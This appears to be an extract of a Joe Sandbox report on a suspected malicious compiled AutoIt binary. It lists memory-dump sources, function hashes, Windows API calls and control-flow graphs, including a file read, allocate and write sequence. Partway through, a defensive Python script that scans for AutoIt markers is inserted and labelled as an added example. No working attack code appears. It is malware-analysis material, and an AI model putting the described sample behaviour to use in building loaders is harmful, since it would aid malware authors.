                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                                                  • String ID: I/
                                                                                                                  • API String ID: 48322524-530815126
                                                                                                                  • Opcode ID: 2b09fbcd14cb3738b03d25cdf6967aaad1b060483e9cb5ef08c112a6911495fc
                                                                                                                  • Instruction ID: fec251fed67e5b2220a6655bcfae9c9056dde29d44803fecee7b45237abd1c56
                                                                                                                  • Opcode Fuzzy Hash: 2b09fbcd14cb3738b03d25cdf6967aaad1b060483e9cb5ef08c112a6911495fc
                                                                                                                  • Instruction Fuzzy Hash: EBE0D831D154205B82107738FC0E4EA77ACDB0A379F501705F471E11D0E7F0D90445D5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                                                                  • String ID: @$ $ $
                                                                                                                  • API String ID: 3728558374-1762808387
                                                                                                                  • Opcode ID: 8d8bc87656382e2ca997a250bdbdda2f79a06fc357343c7484a91e2ba53071be
                                                                                                                  • Instruction ID: 0bcbb1805439a9f4e21353ba3aa027e93901308ad6909c3d46bccc78ea621b43
                                                                                                                  • Opcode Fuzzy Hash: 8d8bc87656382e2ca997a250bdbdda2f79a06fc357343c7484a91e2ba53071be
                                                                                                                  • Instruction Fuzzy Hash: 18727C74A042099FCB14DF94D881ABEB7B5EF48304F1AC059EE49BB291D731EE45CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3964851224-3209568608
                                                                                                                  • Opcode ID: 827965c8f32ef2c9e9d67f6212072240f5b3a5f33bd628c26a971f2cc940bc84
                                                                                                                  • Instruction ID: 3cb902f4162e7e3e9b0db7c918f6f1ce4fe9c58dceba17ab279d3d21e5826632
                                                                                                                  • Opcode Fuzzy Hash: 827965c8f32ef2c9e9d67f6212072240f5b3a5f33bd628c26a971f2cc940bc84
                                                                                                                  • Instruction Fuzzy Hash: D5926A70608345DFD714DF18C490B6AB7E1FF88308F1A885DEA8A9B352D771E945CB62
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DEE959
• timeGetTime.WINMM ref: 00DEEBFA
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DEED2E
• TranslateMessage.USER32(?), ref: 00DEED3F
• DispatchMessageW.USER32(?), ref: 00DEED4A
• LockWindowUpdate.USER32(00000000), ref: 00DEED79
• DestroyWindow.USER32 ref: 00DEED85
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DEED9F
• Sleep.KERNEL32(0000000A), ref: 00E55270
• TranslateMessage.USER32(?), ref: 00E559F7
• DispatchMessageW.USER32(?), ref: 00E55A05
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E55A19
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 2641332412-570651680
• Opcode ID: 12c1e665b252bdae175b7c89460180fd22bb763510ece2a03587748a78aa1364
• Instruction ID: 880f7de5787213990b2ef83009b9d460d28cf174e9b9cbb8af6d9389859419d8
• Opcode Fuzzy Hash: 12c1e665b252bdae175b7c89460180fd22bb763510ece2a03587748a78aa1364
• Instruction Fuzzy Hash: BB62B371508380CFD724EF25C895BAA77E4BF44304F18596DF986AB292D7B1D848CB72
APIs
• ___createFile.LIBCMT ref: 00E15EC3
• ___createFile.LIBCMT ref: 00E15F04
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E15F2D
• __dosmaperr.LIBCMT ref: 00E15F34
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00E15F47
• GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E15F6A
• __dosmaperr.LIBCMT ref: 00E15F73
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E15F7C
• __set_osfhnd.LIBCMT ref: 00E15FAC
• __lseeki64_nolock.LIBCMT ref: 00E16016
• __close_nolock.LIBCMT ref: 00E1603C
• __chsize_nolock.LIBCMT ref: 00E1606C
• __lseeki64_nolock.LIBCMT ref: 00E1607E
• __lseeki64_nolock.LIBCMT ref: 00E16176
• __lseeki64_nolock.LIBCMT ref: 00E1618B
• __close_nolock.LIBCMT ref: 00E161EB
  • Part of subcall function 00E0EA9C: CloseHandle.KERNELBASE(00000000,00E8EEF4,00000000,?,00E16041,00E8EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E0EAEC
  • Part of subcall function 00E0EA9C: GetLastError.KERNEL32(?,00E16041,00E8EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E0EAF6
  • Part of subcall function 00E0EA9C: __free_osfhnd.LIBCMT ref: 00E0EB03
  • Part of subcall function 00E0EA9C: __dosmaperr.LIBCMT ref: 00E0EB25
  • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
• __lseeki64_nolock.LIBCMT ref: 00E1620D
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E16342
• ___createFile.LIBCMT ref: 00E16361
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E1636E
• __dosmaperr.LIBCMT ref: 00E16375
• __free_osfhnd.LIBCMT ref: 00E16395
• __invoke_watson.LIBCMT ref: 00E163C3
• __wsopen_helper.LIBCMT ref: 00E163DD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
• String ID: @
• API String ID: 3896587723-2766056989
• Opcode ID: 4a0387eeda3f353d154bd3126cc7cf64f066b8634d669210795c0972da984dc4
• Instruction ID: 2cbe556c5036d8602a3cb2809c80b1369f2a3c794254005ffe956092f206804b
• Opcode Fuzzy Hash: 4a0387eeda3f353d154bd3126cc7cf64f066b8634d669210795c0972da984dc4
• Instruction Fuzzy Hash: C2222872E006059FEB259F68DC45BFE7B61EB85318F285229E921B72E1C3358DD0C791

Control-flow Graph

APIs
• _wcscpy.LIBCMT ref: 00E2FA96
• _wcschr.LIBCMT ref: 00E2FAA4
• _wcscpy.LIBCMT ref: 00E2FABB
• _wcscat.LIBCMT ref: 00E2FACA
• _wcscat.LIBCMT ref: 00E2FAE8
• _wcscpy.LIBCMT ref: 00E2FB09
• __wsplitpath.LIBCMT ref: 00E2FBE6
• _wcscpy.LIBCMT ref: 00E2FC0B
• _wcscpy.LIBCMT ref: 00E2FC1D
• _wcscpy.LIBCMT ref: 00E2FC32
• _wcscat.LIBCMT ref: 00E2FC47
• _wcscat.LIBCMT ref: 00E2FC59
• _wcscat.LIBCMT ref: 00E2FC6E
  • Part of subcall function 00E2BFA4: _wcscmp.LIBCMT ref: 00E2C03E
  • Part of subcall function 00E2BFA4: __wsplitpath.LIBCMT ref: 00E2C083
  • Part of subcall function 00E2BFA4: _wcscpy.LIBCMT ref: 00E2C096
  • Part of subcall function 00E2BFA4: _wcscat.LIBCMT ref: 00E2C0A9
  • Part of subcall function 00E2BFA4: __wsplitpath.LIBCMT ref: 00E2C0CE
  • Part of subcall function 00E2BFA4: _wcscat.LIBCMT ref: 00E2C0E4
  • Part of subcall function 00E2BFA4: _wcscat.LIBCMT ref: 00E2C0F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
• String ID: >>>AUTOIT SCRIPT<<<$t2
• API String ID: 2955681530-945735720
• Opcode ID: df84853543f1a3b320b3a9f6423575e581043ae4a7544ff8dd5c526817c24f30
• Instruction ID: f367b61c2e05904d40a7b820f210193c39572df2b79fb82aebf18d540fcf4947
• Opcode Fuzzy Hash: df84853543f1a3b320b3a9f6423575e581043ae4a7544ff8dd5c526817c24f30
• Instruction Fuzzy Hash: 2991C272504345AFDB20EB50D891F9FB3E8FF94304F045829F949A7292DB34EA44CBA2
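The String ID above (>>>AUTOIT SCRIPT<<<), together with the @GUI_CTRLHANDLE, @GUI_CTRLID, @GUI_WINHANDLE and @TRAY_ID macro names listed for the message-loop function earlier, is the string evidence behind the "Binary is likely a compiled AutoIt script file" verdict. The following offline triage check is an added example and is not part of the Joe Sandbox report or of the sample: the >>>AUTOIT SCRIPT<<< marker and the macro names are taken from the records on this page, the AU3!EA06 header magic is assumed from AutoIt's compiled-script format and does not appear on this page, and the input buffer is constructed rather than the real sample.

```python
"""Triage check for compiled-AutoIt markers in a PE or memory dump.

Added example, not code from the Joe Sandbox report. The script marker
and macro names are the strings the report lists; AU3_MAGIC is an
assumption about the AutoIt v3 compiled-script header, not shown on
the page.
"""
import sys

# Marker the report shows as a String ID (stored as UTF-16LE in the runtime).
AUTOIT_SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"
# Assumed header magic of the embedded compiled script (not on the report page).
AU3_MAGIC = b"AU3!EA06"
# Macro names the report lists for the GUI message-loop function.
AUTOIT_MACROS = ("@GUI_CTRLHANDLE", "@GUI_CTRLID", "@GUI_WINHANDLE", "@TRAY_ID")


def _encodings(s: str):
    """Yield (label, bytes) for the ASCII and UTF-16LE forms of a string."""
    yield "ascii", s.encode("ascii")
    yield "utf-16le", s.encode("utf-16-le")


def _find_all(data: bytes, needle: bytes):
    """Yield every offset at which needle occurs in data (overlaps allowed)."""
    start = 0
    while True:
        i = data.find(needle, start)
        if i < 0:
            return
        yield i
        start = i + 1


def scan_autoit_markers(data: bytes) -> list:
    """Return (marker, encoding, offset) tuples, sorted by offset."""
    hits = []
    for label, needle in _encodings(AUTOIT_SCRIPT_MARKER):
        hits.extend((AUTOIT_SCRIPT_MARKER, label, off) for off in _find_all(data, needle))
    for off in _find_all(data, AU3_MAGIC):
        hits.append((AU3_MAGIC.decode("ascii"), "ascii", off))
    for macro in AUTOIT_MACROS:
        for label, needle in _encodings(macro):
            hits.extend((macro, label, off) for off in _find_all(data, needle))
    return sorted(hits, key=lambda h: h[2])


def is_likely_autoit(data: bytes) -> bool:
    """Decide on strong evidence only: the script marker or the AU3 magic.

    Macro names alone are weak evidence, since every AutoIt runtime build
    carries them, so they are reported but do not drive the verdict.
    """
    markers = {h[0] for h in scan_autoit_markers(data)}
    return AUTOIT_SCRIPT_MARKER in markers or AU3_MAGIC.decode("ascii") in markers


def build_sample(autoit: bool) -> bytes:
    """Constructed test input, not a real binary: a fake MZ/PE header and
    filler, with the AutoIt markers appended when autoit is True."""
    buf = bytearray(b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 256)
    if autoit:
        buf += AUTOIT_SCRIPT_MARKER.encode("utf-16-le") + b"\x00" * 16
        for macro in AUTOIT_MACROS:
            buf += macro.encode("utf-16-le") + b"\x00\x00"
        buf += b"\x00" * 32 + AU3_MAGIC + b"\x00" * 64
    return bytes(buf)


if __name__ == "__main__":
    # With a path argument, scan that file; otherwise scan the constructed buffer.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample(True)
    for marker, enc, off in scan_autoit_markers(data):
        print(f"0x{off:08x}  {enc:8s}  {marker}")
    print("likely compiled AutoIt" if is_likely_autoit(data) else "no AutoIt markers found")
```

Run it as `python autoit_check.py B7N48hmO78.exe` against a file or a .sdmp memory dump; with no argument it scans the constructed buffer. Both ASCII and UTF-16LE forms are searched because the runtime stores these strings as wide characters while a dumped resource or a script wrapper may carry them as ASCII.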
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: __getptd_noexit
• String ID:
• API String ID: 3074181302-0
• Opcode ID: dc490ef674e360cfa1fda65388dd8727a9c16fe39198481ff859e03def2be6f3
• Instruction ID: 4ce4b148e353eae744944562598c0c6c32473a631b32f8b88ef65c247a764aa5
• Opcode Fuzzy Hash: dc490ef674e360cfa1fda65388dd8727a9c16fe39198481ff859e03def2be6f3
• Instruction Fuzzy Hash: FF323870E04245DFDB318F58D840BAE7BB1AF96328F245469E895BB6D2C7709CD1C7A0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1072 e2bfa4-e2c054 call e0f8a0 call dff4ea call de47b7 call e2bdb4 call de4517 call e015e3 1085 e2c107-e2c10e call e2c56d 1072->1085 1086 e2c05a-e2c061 call e2c56d 1072->1086 1091 e2c110-e2c112 1085->1091 1092 e2c117 1085->1092 1086->1091 1093 e2c067-e2c105 call e01dfc call e00d23 call e00cf4 call e01dfc call e00cf4 * 2 1086->1093 1094 e2c367-e2c368 1091->1094 1096 e2c11a-e2c1d6 call de44ed * 8 call e2c71a call e03499 1092->1096 1093->1096 1099 e2c385-e2c393 call de47e2 1094->1099 1131 e2c1d8-e2c1da 1096->1131 1132 e2c1df-e2c1fa call e2bdf8 1096->1132 1131->1094 1135 e2c200-e2c208 1132->1135 1136 e2c28c-e2c298 call e035e4 1132->1136 1137 e2c210 1135->1137 1138 e2c20a-e2c20e 1135->1138 1143 e2c29a-e2c2a9 DeleteFileW 1136->1143 1144 e2c2ae-e2c2b2 1136->1144 1140 e2c215-e2c233 call de44ed 1137->1140 1138->1140 1148 e2c235-e2c23b 1140->1148 1149 e2c25d-e2c273 call e2b791 call e02aae 1140->1149 1143->1094 1146 e2c342-e2c356 CopyFileW 1144->1146 1147 e2c2b8-e2c32f call e2c81d call e2c845 call e2b965 1144->1147 1151 e2c36a-e2c380 DeleteFileW call e2c6d9 1146->1151 1152 e2c358-e2c365 DeleteFileW 1146->1152 1147->1151 1168 e2c331-e2c340 DeleteFileW 1147->1168 1153 e2c23d-e2c250 call e2bf2e 1148->1153 1165 e2c278-e2c283 1149->1165 1151->1099 1152->1094 1163 e2c252-e2c25b 1153->1163 1163->1149 1165->1135 1167 e2c289 1165->1167 1167->1136 1168->1094
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E2BDB4: __time64.LIBCMT ref: 00E2BDBE
                                                                                                                    • Part of subcall function 00DE4517: _fseek.LIBCMT ref: 00DE452F
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E2C083
                                                                                                                    • Part of subcall function 00E01DFC: __wsplitpath_helper.LIBCMT ref: 00E01E3C
                                                                                                                  • _wcscpy.LIBCMT ref: 00E2C096
                                                                                                                  • _wcscat.LIBCMT ref: 00E2C0A9
                                                                                                                  • __wsplitpath.LIBCMT ref: 00E2C0CE
                                                                                                                  • _wcscat.LIBCMT ref: 00E2C0E4
                                                                                                                  • _wcscat.LIBCMT ref: 00E2C0F7
                                                                                                                  • _wcscmp.LIBCMT ref: 00E2C03E
                                                                                                                    • Part of subcall function 00E2C56D: _wcscmp.LIBCMT ref: 00E2C65D
                                                                                                                    • Part of subcall function 00E2C56D: _wcscmp.LIBCMT ref: 00E2C670
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E2C2A1
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E2C338
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E2C34E
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E2C35F
                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E2C371
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2378138488-0
                                                                                                                  • Opcode ID: ff26239806b6d9db8278feb2b61c927b3a664955b0f8200e5c94353ff06e2fd9
                                                                                                                  • Instruction ID: 2ade7247ffb71ba1e8b3a837dc005be82e12c7953815ef44e5161fa132d84138
                                                                                                                  • Opcode Fuzzy Hash: ff26239806b6d9db8278feb2b61c927b3a664955b0f8200e5c94353ff06e2fd9
                                                                                                                  • Instruction Fuzzy Hash: 4DC11AB1A00229ABDF11EF95DC81EDEB7BDEF49304F1050AAE609F6151DB709A848F61

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00DE3E79
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00DE3E88
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00DE3E9E
                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00DE3EB0
                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00DE3EC2
                                                                                                                    • Part of subcall function 00DE4024: LoadImageW.USER32(00DE0000,00000063,00000001,00000010,00000010,00000000), ref: 00DE4048
                                                                                                                  • RegisterClassExW.USER32(?), ref: 00DE3F30
                                                                                                                    • Part of subcall function 00DE3F53: GetSysColorBrush.USER32(0000000F), ref: 00DE3F86
                                                                                                                    • Part of subcall function 00DE3F53: RegisterClassExW.USER32(00000030), ref: 00DE3FB0
                                                                                                                    • Part of subcall function 00DE3F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DE3FC1
                                                                                                                    • Part of subcall function 00DE3F53: LoadIconW.USER32(000000A9), ref: 00DE4004
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                  • API String ID: 2880975755-4155596026
                                                                                                                  • Opcode ID: d6fe8a57ae76a26cdabf5c20f7a76dd83e1616d003534c92093f00ac09bfd5b0
                                                                                                                  • Instruction ID: 977dbdd0c34b5eaf0cd4fac4fdc2e23de10a2f0f2c764cf9d53824d462e4289c
                                                                                                                  • Opcode Fuzzy Hash: d6fe8a57ae76a26cdabf5c20f7a76dd83e1616d003534c92093f00ac09bfd5b0
                                                                                                                  • Instruction Fuzzy Hash: 2C2153B0E05314AFCB00DFABEC49A9ABBF5FB4D350F00415AE204B32A0D77169488FA1

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00DE3F86
                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00DE3FB0
                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DE3FC1
                                                                                                                  • LoadIconW.USER32(000000A9), ref: 00DE4004
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                  • API String ID: 975902462-1005189915
                                                                                                                  • Opcode ID: f2765fac5554219f56d20a6f986a03fc707061cfdbbcd519dd22a41c24e33cf4
                                                                                                                  • Instruction ID: b804d9c420c9a7ba1a1da5df96f417f905fbb3f73afec89d63bdaf9ef736305c
                                                                                                                  • Opcode Fuzzy Hash: f2765fac5554219f56d20a6f986a03fc707061cfdbbcd519dd22a41c24e33cf4
                                                                                                                  • Instruction Fuzzy Hash: F721E3B5E04318AFDB40DFA6EC89BCEBBB5FB09740F04421AF611B62A0D7B415488F91

                                                                                                                   Control-flow Graph (recovered from the graph data; the rendered figure, including its executed / not executed colouring, is not available)
                                                                                                                   • 16 basic blocks from 10b8b80 to 10b8d38; the entry block 10b8b80-10b8bd2 calls 10b8a80 and then CreateFileW
                                                                                                                   • Main path: CreateFileW (10b8b80) → VirtualAlloc (10b8bfb) → CreateFileW (10b8c1b) → ReadFile (10b8c65) → WriteFile (10b8cc8) → CloseHandle, VirtualFree (10b8d0a)
                                                                                                                   • Every other edge leads, through a short intermediate block, to the single exit block 10b8d34-10b8d38
